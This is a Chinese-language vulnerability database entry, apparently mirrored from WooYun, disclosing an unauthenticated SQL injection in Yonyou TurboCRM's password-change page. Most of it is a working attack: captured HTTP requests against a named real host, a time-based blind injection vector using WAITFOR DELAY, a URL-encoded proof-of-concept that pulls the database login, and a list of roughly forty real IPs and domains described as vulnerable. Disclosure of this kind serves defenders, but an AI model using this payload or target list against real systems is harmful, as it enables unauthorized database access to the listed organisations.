|用友CRM注入漏洞（无需登录通杀所有版本）

用友CRM注入漏洞（无需登录通杀所有版本）

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：用友某系统注入漏洞，无需登录，通杀所有版本 ### 详细说明：用友TurboCRM存在通用sql注入。 http://crm.varsal.com.cn:8081/login/login.php 如下图找到找回密码页 [<img src="https://images.seebug.org/upload/201409/1513060665d1fde2cc208efbd0638610d9a9e963.jpg" alt="wooyun.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1513060665d1fde2cc208efbd0638610d9a9e963.jpg) 访问 http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=system [<img src="https://images.seebug.org/upload/201409/15130814c63a590e2a751d0369ff96fe72b8a303.png" alt="wooyun1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/15130814c63a590e2a751d0369ff96fe72b8a303.png) 输入信息抓包 ``` POST /login/changepswd.php?orgcode=1&loginname=system HTTP/1.1 Host: crm.varsal.com.cn:8081 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=system Content-Length: 95 Cookie: PHPSESSID=8a4jg4pb034v5dcbachfllljd1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache submit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1&loginname=system&key=-1 ``` [<img src="https://images.seebug.org/upload/201409/151309383293210d406e065240c7dcb62a3057c0.png" alt="wooyun2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/151309383293210d406e065240c7dcb62a3057c0.png) 算法:Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-- 影响 218.94.82.23 prm.ufida.com.cn crm.landwind.com.cn crm.szclou.com http://yindajituan.gicp.net:8888 182.135.191.86 111.40.0.242:9091 222.171.32.36:9091 219.90.119.35:8081 180.168.98.94:8088 prm.yonyou.com www.kdlian.com:8001 prm.chanjet.com qinyuancrm.com kfdq369.gicp.net 220.113.5.194 218.84.134.162:8088 turbocrm.yofc.com crm.elfa.com.cn crm.pearmain.cn nc.shineroad.com crm.westernpower.cn crm7.abgroup.cn crm.transn.net zh4433.vicp.net 218.108.86.226 crm.yiwenkeji.com:8080 218.95.66.88:9036 crm.digisystem.com.cn:8080 crm.shineroad.com crm.siweidg.com 222.41.174.190:8088 117.36.76.254:8080 hq.longmanschools.com.cn:8080 59.50.33.86:9000 182.135.191.87 crm.szclou.com:8088 58.220.225.28:8080 ### 漏洞证明： POC ``` POST /login/changepswd.php?orgcode=1&loginname=system HTTP/1.1 Accept-language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox 32.0 Host: crm.varsal.com.cn:8081 Referer: http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname system Pragma: no-cache Cache-control: no-cache X-Requested-With: XMLHttpRequest Content-type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: PHPSESSID=8a4jg4pb034v5dcbachfllljd1 Content-length: 276 Connection: close submit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1%27%20IF 28UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28SYSTEM_USER%20AS%20NVARCHAR 284000%29%29%2CCHAR%2832%29%29%29%2C3%2C1%29%29%3E1%29%20WAITFOR%20DELAY%20%270 3A0%3A1%27--&loginname=system&key=-1 ``` 用户sa 还有一系列用友

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™